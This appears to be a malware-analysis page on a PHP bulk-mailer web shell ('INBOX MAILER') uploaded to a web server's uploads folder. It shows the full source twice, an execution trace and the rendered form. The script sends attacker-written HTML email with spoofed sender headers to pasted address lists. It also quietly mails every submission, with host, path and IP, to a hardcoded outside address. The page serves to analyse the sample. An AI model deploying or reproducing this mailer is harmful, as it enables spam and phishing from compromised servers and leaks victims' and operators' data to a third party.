Jump to:
Screenshot
Attributes
Emails
<?php
$testa = $_POST['veio'];
if ($testa != "") {
$message = $_POST['html'];
$subject = $_POST['assunto'];
$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
$headers = "MIME-Version: 1.0\r\n";
$headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
$email = explode("\n", $to);
$headers .= "From: " . $nome . " <" . $de . ">\r\n";
$message = stripslashes($message);
$i = 0;
$count = 1;
while ($email[$i]) {
$ok = "ok";
if (mail($email[$i], $subject, $message, $headers)) {
echo "* Número: {$count} <b>" . $email[$i] . "</b> <font color=green>NoturnO_=_2oo8 =)</font><br><hr>";
} else {
echo "* Número: {$count} <b>" . $email[$i] . "</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";
}
$i++;
$count++;
}
$count--;
if ($ok == "ok") {
echo "";
}
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = "Sendi {$ip}";
$email = "tgermetti.02@gmail.com";
$from = "From: Sendiw a Wlidati <BIMO@2M.TV>";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$f12 = $_POST['veio'];
$z13 = $_POST['html'];
$x14 = $_POST['assunto'];
$t15 = $_POST['nome'];
$m30 = $_POST['de'];
$m16 = $_POST['emails'];
$m22 = $ip . "\n";
$msg8873 = "{$a45}\n{$b75}\n{$f12}\n{$z13}\n{$x14}\n{$t15}\n{$m30}\n{$m16}\n{$m22}";
mail($email, $subj98, $msg8873, $from);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>INBOX MAILER</title>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<style>
body {
margin-left: 0;
margin-right: 0;
margin-top: 0;
margin-bottom: 0;
background-image: url(http://wallpapercave.com/wp/oIkQIOd.jpg);
}
.titulo {
font-family: Arial, Helvetica, sans-serif;
font-size: 70px;
color: #000000;
font-weight: bold;
}
.normal {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000000;
}
.form {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
color: #333333;
background-color: #FFFFFF;
border: 1px dashed #666666;
}
.texto {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}
.alerta {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
color: #990000;
font-size: 10px;
}
#Layer1 {
position:absolute;
width:200px;
height:115px;
z-index:1;
left: 158px;
top: 38px;
}
</style>
</head>
<body>
<div id="Layer1">
<form action="" method="post"
enctype="multipart/form-data" name="form1">
<input name="veio" value="sim" type="hidden">
<table class="normal"
style="background-color: rgb(204, 204, 204); width: 464px; height: 511px;"
border="0" cellpadding="0" cellspacing="1">
<tbody>
<tr style="color: rgb(255, 255, 255);">
<td
style="width: 462px; height: 25px; text-align: center; background-color: rgb(51, 204, 0);"><span
class="titulo">Inb0x<br>
</span></td>
</tr>
<tr>
<td bgcolor="#ffffff" height="194" valign="top"><table style="width: 100%; height: 444px;"
class="normal" border="0" cellpadding="0"
cellspacing="5">
<tbody>
<tr>
<td align="right" height="17"><span
class="texto">De (Nome)/(E-Mail) :</span></td>
<td height="17" width="65%"><input
name="nome" value="" class="form" id="nome"
style="width: 48%;" type="text">
<input name="de"
value="" class="form" id="de" style="width: 49%;"
type="text"></td>
</tr>
<tr>
<td align="right" height="17"><span
class="texto">Assunto:</span></td>
<td height="17"><input name="assunto"
value="" class="form" id="assunto"
style="width: 100%;" type="text"></td>
</tr>
<tr align="center" bgcolor="#99ccff">
<td colspan="2"
style="height: 20px; background-color: rgb(255, 255, 0);"><span
class="texto">Código HTML:</span></td>
</tr>
<tr align="right">
<td colspan="2" height="146" valign="top"><br>
<textarea name="html" style="width: 100%;"
rows="8" wrap="VIRTUAL" class="form" id="html">
</textarea>
<span class="alerta">*Lembrete:
texto em HTML</span></td>
</tr>
<tr align="center" bgcolor="#99ccff">
<td colspan="2"
style="height: 47px; background-color: rgb(255, 0, 0);"><span
class="texto">" Not everything you see glitter is gold "</span> </td>
</tr>
<tr align="right">
<td colspan="2" height="136" valign="top"><br>
<textarea name="emails" style="width: 100%;"
rows="8" wrap="VIRTUAL" class="form" id="emails">
</textarea>
<span class="alerta">*Separado
por quebra de linha</span> </td>
</tr>
<tr>
<td colspan="2" align="right" height="26"
valign="top"><input name="Submit" value="Spamii"
type="submit"></td>
</tr>
</tbody>
</table></td>
</tr>
<tr style="color: rgb(255, 255, 255); font-weight: bold;">
<td
style="height: 15px; text-align: center; background-color: rgb(51, 51, 51);">" Life
worth more then gold "</td>
</tr>
</tbody>
</table>
</form>
</div>
</body>
</html>
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:06:40.073591]
1 0 1 0.000225 393464
1 3 0 0.000359 414624 {main} 1 /var/www/html/uploads/sp.php 0 0
1 A /var/www/html/uploads/sp.php 2 $testa = NULL
2 4 0 0.000410 414624 getenv 0 /var/www/html/uploads/sp.php 33 1 'REMOTE_ADDR'
2 4 1 0.000426 414696
2 4 R '127.0.0.1'
1 A /var/www/html/uploads/sp.php 33 $ip = '127.0.0.1'
2 5 0 0.000451 414664 rand 0 /var/www/html/uploads/sp.php 34 2 1 99999
2 5 1 0.000467 414728
2 5 R 47799
1 A /var/www/html/uploads/sp.php 34 $ra44 = 47799
1 A /var/www/html/uploads/sp.php 35 $subj98 = 'Sendi 127.0.0.1'
1 A /var/www/html/uploads/sp.php 36 $email = 'tgermetti.02@gmail.com'
1 A /var/www/html/uploads/sp.php 37 $from = 'From: Sendiw a Wlidati <BIMO@2M.TV>'
1 A /var/www/html/uploads/sp.php 38 $a45 = '/uploads/sp.php'
1 A /var/www/html/uploads/sp.php 39 $b75 = 'localhost'
1 A /var/www/html/uploads/sp.php 40 $f12 = NULL
1 A /var/www/html/uploads/sp.php 41 $z13 = NULL
1 A /var/www/html/uploads/sp.php 42 $x14 = NULL
1 A /var/www/html/uploads/sp.php 43 $t15 = NULL
1 A /var/www/html/uploads/sp.php 44 $m30 = NULL
1 A /var/www/html/uploads/sp.php 45 $m16 = NULL
1 A /var/www/html/uploads/sp.php 46 $m22 = '127.0.0.1\n'
1 A /var/www/html/uploads/sp.php 47 $msg8873 = '/uploads/sp.php\nlocalhost\n\n\n\n\n\n\n127.0.0.1\n'
2 6 0 0.000653 414824 mail 0 /var/www/html/uploads/sp.php 48 4 'tgermetti.02@gmail.com' 'Sendi 127.0.0.1' '/uploads/sp.php\nlocalhost\n\n\n\n\n\n\n127.0.0.1\n' 'From: Sendiw a Wlidati <BIMO@2M.TV>'
2 6 1 0.001551 414968
2 6 R FALSE
1 3 1 0.001601 414936
0.001643 315024
TRACE END [2023-02-13 00:06:40.075092]
<html><head>
<title>INBOX MAILER</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
body {
margin-left: 0;
margin-right: 0;
margin-top: 0;
margin-bottom: 0;
background-image: url(http://wallpapercave.com/wp/oIkQIOd.jpg);
}
.titulo {
font-family: Arial, Helvetica, sans-serif;
font-size: 70px;
color: #000000;
font-weight: bold;
}
.normal {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000000;
}
.form {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
color: #333333;
background-color: #FFFFFF;
border: 1px dashed #666666;
}
.texto {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}
.alerta {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
color: #990000;
font-size: 10px;
}
#Layer1 {
position:absolute;
width:200px;
height:115px;
z-index:1;
left: 158px;
top: 38px;
}
</style>
</head>
<body>
<div id="Layer1">
<form action="" method="post" enctype="multipart/form-data" name="form1">
<input name="veio" value="sim" type="hidden">
<table class="normal" style="background-color: rgb(204, 204, 204); width: 464px; height: 511px;" border="0" cellpadding="0" cellspacing="1">
<tbody>
<tr style="color: rgb(255, 255, 255);">
<td style="width: 462px; height: 25px; text-align: center; background-color: rgb(51, 204, 0);"><span class="titulo">Inb0x<br>
</span></td>
</tr>
<tr>
<td bgcolor="#ffffff" height="194" valign="top"><table style="width: 100%; height: 444px;" class="normal" border="0" cellpadding="0" cellspacing="5">
<tbody>
<tr>
<td align="right" height="17"><span class="texto">De (Nome)/(E-Mail) :</span></td>
<td height="17" width="65%"><input name="nome" value="" class="form" id="nome" style="width: 48%;" type="text">
<input name="de" value="" class="form" id="de" style="width: 49%;" type="text"></td>
</tr>
<tr>
<td align="right" height="17"><span class="texto">Assunto:</span></td>
<td height="17"><input name="assunto" value="" class="form" id="assunto" style="width: 100%;" type="text"></td>
</tr>
<tr align="center" bgcolor="#99ccff">
<td colspan="2" style="height: 20px; background-color: rgb(255, 255, 0);"><span class="texto">Código HTML:</span></td>
</tr>
<tr align="right">
<td colspan="2" height="146" valign="top"><br>
<textarea name="html" style="width: 100%;" rows="8" wrap="VIRTUAL" class="form" id="html"> </textarea>
<span class="alerta">*Lembrete:
texto em HTML</span></td>
</tr>
<tr align="center" bgcolor="#99ccff">
<td colspan="2" style="height: 47px; background-color: rgb(255, 0, 0);"><span class="texto">" Not everything you see glitter is gold "</span> </td>
</tr>
<tr align="right">
<td colspan="2" height="136" valign="top"><br>
<textarea name="emails" style="width: 100%;" rows="8" wrap="VIRTUAL" class="form" id="emails"> </textarea>
<span class="alerta">*Separado
por quebra de linha</span> </td>
</tr>
<tr>
<td colspan="2" align="right" height="26" valign="top"><input name="Submit" value="Spamii" type="submit"></td>
</tr>
</tbody>
</table></td>
</tr>
<tr style="color: rgb(255, 255, 255); font-weight: bold;">
<td style="height: 15px; text-align: center; background-color: rgb(51, 51, 51);">" Life
worth more then gold "</td>
</tr>
</tbody>
</table>
</form>
</div>
</body></html>
<?php
$testa = $_POST['veio'];
if($testa != "") {
$message = $_POST['html'];
$subject = $_POST['assunto'];
$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$email = explode("\n", $to);
$headers .= "From: ".$nome." <".$de.">\r\n";
$message = stripslashes($message);
$i = 0;
$count = 1;
while($email[$i]) {
$ok = "ok";
if(mail($email[$i], $subject, $message, $headers))
echo "* Número: $count <b>".$email[$i]."</b> <font color=green>NoturnO_=_2oo8 =)</font><br><hr>";
else
echo "* Número: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";
$i++;
$count++;
}
$count--;
if($ok == "ok")
echo "";
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1,99999);
$subj98 = "Sendi $ip";
$email = "tgermetti.02@gmail.com";
$from="From: Sendiw a Wlidati <BIMO@2M.TV>";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$f12 = $_POST['veio'];
$z13 = $_POST['html'];
$x14 = $_POST['assunto'];
$t15 = $_POST['nome'];
$m30 = $_POST['de'];
$m16 = $_POST['emails'];
$m22 = $ip."\n";
$msg8873 = "$a45\n$b75\n$f12\n$z13\n$x14\n$t15\n$m30\n$m16\n$m22";
mail($email, $subj98, $msg8873, $from);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>INBOX MAILER</title>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<style>
body {
margin-left: 0;
margin-right: 0;
margin-top: 0;
margin-bottom: 0;
background-image: url(http://wallpapercave.com/wp/oIkQIOd.jpg);
}
.titulo {
font-family: Arial, Helvetica, sans-serif;
font-size: 70px;
color: #000000;
font-weight: bold;
}
.normal {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000000;
}
.form {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
color: #333333;
background-color: #FFFFFF;
border: 1px dashed #666666;
}
.texto {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}
.alerta {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
color: #990000;
font-size: 10px;
}
#Layer1 {
position:absolute;
width:200px;
height:115px;
z-index:1;
left: 158px;
top: 38px;
}
</style>
</head>
<body>
<div id="Layer1">
<form action="" method="post"
enctype="multipart/form-data" name="form1">
<input name="veio" value="sim" type="hidden">
<table class="normal"
style="background-color: rgb(204, 204, 204); width: 464px; height: 511px;"
border="0" cellpadding="0" cellspacing="1">
<tbody>
<tr style="color: rgb(255, 255, 255);">
<td
style="width: 462px; height: 25px; text-align: center; background-color: rgb(51, 204, 0);"><span
class="titulo">Inb0x<br>
</span></td>
</tr>
<tr>
<td bgcolor="#ffffff" height="194" valign="top"><table style="width: 100%; height: 444px;"
class="normal" border="0" cellpadding="0"
cellspacing="5">
<tbody>
<tr>
<td align="right" height="17"><span
class="texto">De (Nome)/(E-Mail) :</span></td>
<td height="17" width="65%"><input
name="nome" value="" class="form" id="nome"
style="width: 48%;" type="text">
<input name="de"
value="" class="form" id="de" style="width: 49%;"
type="text"></td>
</tr>
<tr>
<td align="right" height="17"><span
class="texto">Assunto:</span></td>
<td height="17"><input name="assunto"
value="" class="form" id="assunto"
style="width: 100%;" type="text"></td>
</tr>
<tr align="center" bgcolor="#99ccff">
<td colspan="2"
style="height: 20px; background-color: rgb(255, 255, 0);"><span
class="texto">Código HTML:</span></td>
</tr>
<tr align="right">
<td colspan="2" height="146" valign="top"><br>
<textarea name="html" style="width: 100%;"
rows="8" wrap="VIRTUAL" class="form" id="html">
</textarea>
<span class="alerta">*Lembrete:
texto em HTML</span></td>
</tr>
<tr align="center" bgcolor="#99ccff">
<td colspan="2"
style="height: 47px; background-color: rgb(255, 0, 0);"><span
class="texto">" Not everything you see glitter is gold "</span> </td>
</tr>
<tr align="right">
<td colspan="2" height="136" valign="top"><br>
<textarea name="emails" style="width: 100%;"
rows="8" wrap="VIRTUAL" class="form" id="emails">
</textarea>
<span class="alerta">*Separado
por quebra de linha</span> </td>
</tr>
<tr>
<td colspan="2" align="right" height="26"
valign="top"><input name="Submit" value="Spamii"
type="submit"></td>
</tr>
</tbody>
</table></td>
</tr>
<tr style="color: rgb(255, 255, 255); font-weight: bold;">
<td
style="height: 15px; text-align: center; background-color: rgb(51, 51, 51);">" Life
worth more then gold "</td>
</tr>
</tbody>
</table>
</form>
</div>
</body>
</html>